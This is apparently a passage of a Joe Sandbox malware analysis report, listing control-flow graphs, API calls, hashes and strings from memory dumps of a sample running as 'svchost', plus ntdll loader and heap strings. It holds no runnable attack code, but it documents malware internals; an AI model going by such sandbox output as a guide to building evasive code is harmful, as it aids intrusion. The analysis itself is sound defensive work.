
                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 0 413ea7-413ea9 1 413f27-413f4d call 424dc3 0->1 2 413eab-413ead 0->2 11 413f6d-413f73 1->11 12 413f4f-413f5e PostThreadMessageW 1->12 4 413f23 2->4 5 413eaf-413ebb 2->5 4->1 7 413e50-413e5f 5->7 8 413ebd-413ec2 5->8 9 413e61-413e65 7->9 10 413e9e-413ea6 7->10 13 413ec4-413ec9 8->13 14 413eca-413ed4 8->14 9->10 10->0 12->11 16 413f60-413f6a 12->16 13->14 16->11
                                                                                                                      APIs
                                                                                                                      • PostThreadMessageW.USER32(1FZhY82B,00000111,00000000,00000000), ref: 00413F5A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostThread
                                                                                                                      • String ID: 1FZhY82B$1FZhY82B
                                                                                                                      • API String ID: 1836367815-1981548960
                                                                                                                      • Opcode ID: ad80f606e86f10dea9f934ee03659be7296a374f05ff619861c4d3bbfa9dc55f
                                                                                                                      • Instruction ID: dd4ca69f747aa19feb929e0ff6999ed915687c6fb858f780f093ef1a09166bd2
                                                                                                                      • Opcode Fuzzy Hash: ad80f606e86f10dea9f934ee03659be7296a374f05ff619861c4d3bbfa9dc55f
                                                                                                                      • Instruction Fuzzy Hash: 2F119E70948358FAC7028FA898928EEFF7CDE41355B04419FF4445B242C2380A878B56
                                                                                                                      Function 00413EDB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61threadwindowCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • PostThreadMessageW.USER32(1FZhY82B,00000111,00000000,00000000), ref: 00413F5A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostThread
                                                                                                                      • String ID: 1FZhY82B$1FZhY82B
                                                                                                                      • API String ID: 1836367815-1981548960
                                                                                                                      • Opcode ID: 27a49c899edb82b6113870ffcac672594c72530e0e998ad9d2404feb65a5771e
                                                                                                                      • Instruction ID: 099926ec115afc2ba8a41aa136d6ef2dbd7d789addee494c63b356f4f313c34f
                                                                                                                      • Opcode Fuzzy Hash: 27a49c899edb82b6113870ffcac672594c72530e0e998ad9d2404feb65a5771e
                                                                                                                      • Instruction Fuzzy Hash: 6D01E5B2D4011C7ADB109AD69C81DEF7B7CDF412A4F40806EBA04A7140D5394E068BB5
                                                                                                                      Function 00413EE3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 32 413ee3-413ef5 33 413efd-413f4d call 42f013 call 417683 call 4049b3 call 424dc3 32->33 34 413ef8 call 42e603 32->34 43 413f6d-413f73 33->43 44 413f4f-413f5e PostThreadMessageW 33->44 34->33 44->43 46 413f60-413f6a 44->46 46->43
                                                                                                                      APIs
                                                                                                                      • PostThreadMessageW.USER32(1FZhY82B,00000111,00000000,00000000), ref: 00413F5A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostThread
                                                                                                                      • String ID: 1FZhY82B$1FZhY82B
                                                                                                                      • API String ID: 1836367815-1981548960
                                                                                                                      • Opcode ID: b66e5805949607ee6329d28efc4e24227eefb95ae6fb20b68079347d859e2955
                                                                                                                      • Instruction ID: 837166051f219dcf0acf42368a899ed7994da6b9e79ef3e2f292b0714652dbb3
                                                                                                                      • Opcode Fuzzy Hash: b66e5805949607ee6329d28efc4e24227eefb95ae6fb20b68079347d859e2955
                                                                                                                      • Instruction Fuzzy Hash: 8F01D6B2D4021C7ADB10ABE69C82DEF7B7CDF40794F45806AFA04B7141D5784E0647B5
                                                                                                                      Function 00413F74 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56threadwindowCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 47 413f74-413f7c 48 413fb4-413fb8 47->48 49 413f7e 47->49 50 413f80 49->50 51 413f59-413f5e PostThreadMessageW 49->51 54 413f82-413f89 50->54 55 413f3c-413f4d 50->55 52 413f60-413f6a 51->52 53 413f6d-413f73 51->53 52->53 58 413f8b-413f8f 54->58 55->53 56 413f4f-413f54 55->56 56->51 59 413f91-413f96 58->59 60 413fad-413fb3 58->60 59->60 61 413f98-413f9d 59->61 60->48 60->58 61->60 62 413f9f-413fa6 61->62 63 413fb9-413fbc 62->63 64 413fa8-413fab 62->64 64->60 64->63
                                                                                                                      APIs
                                                                                                                      • PostThreadMessageW.USER32(1FZhY82B,00000111,00000000,00000000), ref: 00413F5A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostThread
                                                                                                                      • String ID: 1FZhY82B$1FZhY82B
                                                                                                                      • API String ID: 1836367815-1981548960
                                                                                                                      • Opcode ID: ad335d9499ee94209e19f71603539bd00e7a26745e0050f42651442a1ad3b347
                                                                                                                      • Instruction ID: 1468b843ce625f914c8c54cb7477b72e952f1f0d12017e62b9f4ebc9b89fa5b7
                                                                                                                      • Opcode Fuzzy Hash: ad335d9499ee94209e19f71603539bd00e7a26745e0050f42651442a1ad3b347
                                                                                                                      • Instruction Fuzzy Hash: BA014971D106882ADB315E684C81DFBB778DE0A722B0882DBF558873E2C2258EC7835C
                                                                                                                      Function 0042C803 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 288 42c803-42c841 call 404a43 call 42d6e3 RtlFreeHeap
                                                                                                                      APIs
                                                                                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,3534F845,00000007,00000000,00000004,00000000,00416F01,000000F4), ref: 0042C83C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3298025750-0
                                                                                                                      • Opcode ID: ee4a80378d7e914aa81228ca8aa95b21f3188a9d8465ca376272c50f30b7be85
                                                                                                                      • Instruction ID: 6944ed752cb85dc704b81f87a64fd4aafc916dfdbe8c4bc8f195215e56a3f217
                                                                                                                      • Opcode Fuzzy Hash: ee4a80378d7e914aa81228ca8aa95b21f3188a9d8465ca376272c50f30b7be85
                                                                                                                      • Instruction Fuzzy Hash: 44E0ED756042147BD614EE59EC41E9B77ACDFC9714F004419F908A7282D770BA11CBB8
                                                                                                                      Function 0042C7B3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 283 42c7b3-42c7f4 call 404a43 call 42d6e3 RtlAllocateHeap
                                                                                                                      APIs
                                                                                                                      • RtlAllocateHeap.NTDLL(?,0041E4BE,?,?,00000000,?,0041E4BE,?,?,?), ref: 0042C7EF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1279760036-0
                                                                                                                      • Opcode ID: 2076d3691abb0f42e5c63e4bf79718a4a82d97f34ead8509b0a4e5a19c775da4
                                                                                                                      • Instruction ID: 65a6d6ece561d266b3d26d4d5e5f122a3031d8d878127ab0e0a3789f9d20ba63
                                                                                                                      • Opcode Fuzzy Hash: 2076d3691abb0f42e5c63e4bf79718a4a82d97f34ead8509b0a4e5a19c775da4
                                                                                                                      • Instruction Fuzzy Hash: CAE09AB63442047BDA10EF59EC45E9F77ACEFC9710F00841AFA09A7241DA71B911CBB8
                                                                                                                      Function 0042C843 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 298 42c843-42c87c call 404a43 call 42d6e3 ExitProcess
                                                                                                                      APIs
                                                                                                                      • ExitProcess.KERNEL32(?,00000000,00000000,?,3F7BF990,?,?,3F7BF990), ref: 0042C877
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ExitProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 621844428-0
                                                                                                                      • Opcode ID: 9d23823e779e9a20ba76502ef954cdc1e7209ec263be97bf8889fd92fe602561
                                                                                                                      • Instruction ID: e69896cce740a88096ea2a830e6edd5ee7ac9109c229a47839361c9e2e3f551a
                                                                                                                      • Opcode Fuzzy Hash: 9d23823e779e9a20ba76502ef954cdc1e7209ec263be97bf8889fd92fe602561
                                                                                                                      • Instruction Fuzzy Hash: 00E04F717002147BD620EA5ADC01FDB776CDFC5710F00401AFA09A7141C675790187E4
                                                                                                                      Function 03372C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 303 3372c0a-3372c0f 304 3372c11-3372c18 303->304 305 3372c1f-3372c26 LdrInitializeThunk 303->305
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 4adab6d9ce5cd26c5290c1335142a5dae7492745007c339d3c2897f492f23255
                                                                                                                      • Instruction ID: 699a533d1b23b4b733d89062f9e889e927318caf2a26338d16f6583c372ac7b1
                                                                                                                      • Opcode Fuzzy Hash: 4adab6d9ce5cd26c5290c1335142a5dae7492745007c339d3c2897f492f23255
                                                                                                                      • Instruction Fuzzy Hash: 0AB09B719015C5C5DA11F7644A48717790567D0701F59C461D3034645E473DC1D1E175

                                                                                                                      Non-executed Functions

                                                                                                                      Function 033B2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-2160512332
                                                                                                                      • Opcode ID: 7b17fdab54857787c9520235296d37c258e3906d56612323da01ffa5a4cb2ba0
                                                                                                                      • Instruction ID: 52e6e1c751f8be89047145ad7da05a68989a350b2f94bd02f9ed4292e98fc230
                                                                                                                      • Opcode Fuzzy Hash: 7b17fdab54857787c9520235296d37c258e3906d56612323da01ffa5a4cb2ba0
                                                                                                                      • Instruction Fuzzy Hash: 14925A75A04341AFD724DE24C8C1BABB7F8AB84750F084E2DFA95DBA50D774E844CB92
                                                                                                                      Function 033268B8 Relevance: 19.0, Strings: 15, Instructions: 249COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-3089669407
                                                                                                                      • Opcode ID: d5b16f1c55a81774d97ee1264366908c1dc00021d9ff832c3b2b3d8cb4c30810
                                                                                                                      • Instruction ID: ec4f203725e4a122b040d272a1fbcb677b13dafa7f66fbef93b8dfd3febb18b8
                                                                                                                      • Opcode Fuzzy Hash: d5b16f1c55a81774d97ee1264366908c1dc00021d9ff832c3b2b3d8cb4c30810
                                                                                                                      • Instruction Fuzzy Hash: F78101B2D023186F9B22FBD9DDD1EEEB7FDAB14610B544421B910FB114E764EE048BA0
                                                                                                                      Function 03368620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • Invalid debug info address of this critical section, xrefs: 033A54B6
                                                                                                                      • corrupted critical section, xrefs: 033A54C2
                                                                                                                      • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 033A540A, 033A5496, 033A5519
                                                                                                                      • double initialized or corrupted critical section, xrefs: 033A5508
                                                                                                                      • Thread is in a state in which it cannot own a critical section, xrefs: 033A5543
                                                                                                                      • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 033A54E2
                                                                                                                      • Critical section debug info address, xrefs: 033A541F, 033A552E
                                                                                                                      • 8, xrefs: 033A52E3
                                                                                                                      • Critical section address., xrefs: 033A5502
                                                                                                                      • Critical section address, xrefs: 033A5425, 033A54BC, 033A5534
                                                                                                                      • undeleted critical section in freed memory, xrefs: 033A542B
                                                                                                                      • Address of the debug info found in the active list., xrefs: 033A54AE, 033A54FA
                                                                                                                      • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 033A54CE
                                                                                                                      • Thread identifier, xrefs: 033A553A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                      • API String ID: 0-2368682639
                                                                                                                      • Opcode ID: feb056b5c43d271888938d277d8314e3e0f92a13a1354caf939f2a7a3b30dc13
                                                                                                                      • Instruction ID: 7edbc3383f5fc8d925ff299d728be9e4a66cd7c0d8f17cd71e9553845edd5326
                                                                                                                      • Opcode Fuzzy Hash: feb056b5c43d271888938d277d8314e3e0f92a13a1354caf939f2a7a3b30dc13
                                                                                                                      • Instruction Fuzzy Hash: A781BEB4A00758EFEB24CF99C8C0BAEBBB9EB49700F144559E514BB681C775A940CB64
                                                                                                                      Function 03360F30 Relevance: 13.3, Strings: 10, Instructions: 764COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                                                                                                                      • API String ID: 0-360209818
                                                                                                                      • Opcode ID: 7c07a7c41acdf850413c10dd611e2d2c34ca428f1b6e6dc6761c385ff6f02812
                                                                                                                      • Instruction ID: c4a69a1a5b048ecf342589eb4cd83b36231de80d7d39e3639319277bcca8b248
                                                                                                                      • Opcode Fuzzy Hash: 7c07a7c41acdf850413c10dd611e2d2c34ca428f1b6e6dc6761c385ff6f02812
                                                                                                                      • Instruction Fuzzy Hash: 6B6290B5E006298FDB34CF18CC807A9B7BAEF95310F5882DAD449AB244D7765AD1CF50
                                                                                                                      Function 033E12ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                                                      • API String ID: 0-3591852110
                                                                                                                      • Opcode ID: 93b4ce6874977ac69efffc2d2a74996f27249aeb12bccc1f61c675990babd875
                                                                                                                      • Instruction ID: 37fc2c8583841f0cdac7b947e2827e12563963132be6e243f91810f39d0a642a
                                                                                                                      • Opcode Fuzzy Hash: 93b4ce6874977ac69efffc2d2a74996f27249aeb12bccc1f61c675990babd875
                                                                                                                      • Instruction Fuzzy Hash: 5312AC74A04661DFD725CF29C8C1BBAFBF5EF09714F188459E4968BA81D734E880DB50
                                                                                                                      Function 0334AD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                                                      • API String ID: 0-3197712848
                                                                                                                      • Opcode ID: bfe192e43a416373c59e4738025e40158a2c5843f20f1d11c582d5a5e4384d69
                                                                                                                      • Instruction ID: 52123a8e0521c895e5444df4bc350a71a10702caf71c57eb6bea121e4b062060
                                                                                                                      • Opcode Fuzzy Hash: bfe192e43a416373c59e4738025e40158a2c5843f20f1d11c582d5a5e4384d69
                                                                                                                      • Instruction Fuzzy Hash: 5212D075A083418FD724DF28C8C0BAAF7E8BF85704F484A5AF8859F291E774E944CB52
                                                                                                                      Function 0332D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                                                      • API String ID: 0-3532704233
                                                                                                                      • Opcode ID: 8fb668025e6fe5e566fcfce7e41e1218c162f582e97930c696ca459b7bd135fc
                                                                                                                      • Instruction ID: ad1d56e7b0c050ae41c3774812c2f7830b4a38d0f1ab4a366043163a09ee773c
                                                                                                                      • Opcode Fuzzy Hash: 8fb668025e6fe5e566fcfce7e41e1218c162f582e97930c696ca459b7bd135fc
                                                                                                                      • Instruction Fuzzy Hash: 62B19D729083659FC721EF24C8C0B6BBBE8AF88754F05492EF899D7240D774D949CB92
                                                                                                                      Function 033E0CB5 Relevance: 10.4, Strings: 8, Instructions: 402COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                                                                      • API String ID: 0-1357697941
                                                                                                                      • Opcode ID: 5eafa286f0e1240781a9a0e45f51ab81f691aa98bb3449b1c164a13b5f19c1d1
                                                                                                                      • Instruction ID: fb1ad10e606e3ab5739b29d868a387e2956ec4ba7cb9919a036fa6a1b256ed10
                                                                                                                      • Opcode Fuzzy Hash: 5eafa286f0e1240781a9a0e45f51ab81f691aa98bb3449b1c164a13b5f19c1d1
                                                                                                                      • Instruction Fuzzy Hash: EAF11635A00665EFCB29DF69C8C0BAAFBF9FF09710F084059E4919B6D2C774A945CB50
                                                                                                                      Function 033C9179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                                                                      • API String ID: 0-3063724069
                                                                                                                      • Opcode ID: d2c7a1c5c7c172b38c14534d23cf23059a6f1222849887a9dd548d84d64d3ef0
                                                                                                                      • Instruction ID: 2a5d09d9860b1d568496c15b86704b61c8ce5f25e309002922e1219dcbaa6a16
                                                                                                                      • Opcode Fuzzy Hash: d2c7a1c5c7c172b38c14534d23cf23059a6f1222849887a9dd548d84d64d3ef0
                                                                                                                      • Instruction Fuzzy Hash: A3D1F3B2C15395AFD721DB64C8C0BABB7ECAF84724F060A2DFA849B150D774DD448B92
                                                                                                                      Function 033E0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                      • API String ID: 0-1700792311
                                                                                                                      • Opcode ID: e87f2519e54dcfa035e645304c08cde411d5873d481f4a971c510a08c370ea25
                                                                                                                      • Instruction ID: 1b94bfb98c58689eea6d74cd114578ac8ecfb30f8216db128b7305594b758c13
                                                                                                                      • Opcode Fuzzy Hash: e87f2519e54dcfa035e645304c08cde411d5873d481f4a971c510a08c370ea25
                                                                                                                      • Instruction Fuzzy Hash: B0D1CE39904665DFCB2AEF6AC880AADFBF1FF46610F088049E455AF692C7749981CF10
                                                                                                                      Function 0332D08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • @, xrefs: 0332D2AF
                                                                                                                      • Control Panel\Desktop\LanguageConfiguration, xrefs: 0332D196
                                                                                                                      • @, xrefs: 0332D0FD
                                                                                                                      • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0332D262
                                                                                                                      • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0332D146
                                                                                                                      • @, xrefs: 0332D313
                                                                                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0332D2C3
                                                                                                                      • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0332D0CF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                                                      • API String ID: 0-1356375266
                                                                                                                      • Opcode ID: 7e30c753753c9ee6fdb08b2c9e7910315cfb1056a42f219f1687b5722e60ec07
                                                                                                                      • Instruction ID: 34080c92b33ff167f2d9c65f44f07a75e2ad82bbdca79fb9d0e273baa08f9e75
                                                                                                                      • Opcode Fuzzy Hash: 7e30c753753c9ee6fdb08b2c9e7910315cfb1056a42f219f1687b5722e60ec07
                                                                                                                      • Instruction Fuzzy Hash: 92A139719083559FD721DF65C8C4B5BBBE8BB84715F004D2EF6A89A240E778D908CF92
                                                                                                                      Function 0333ADE0 Relevance: 9.3, Strings: 7, Instructions: 573COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3300000_svchost.jbxd
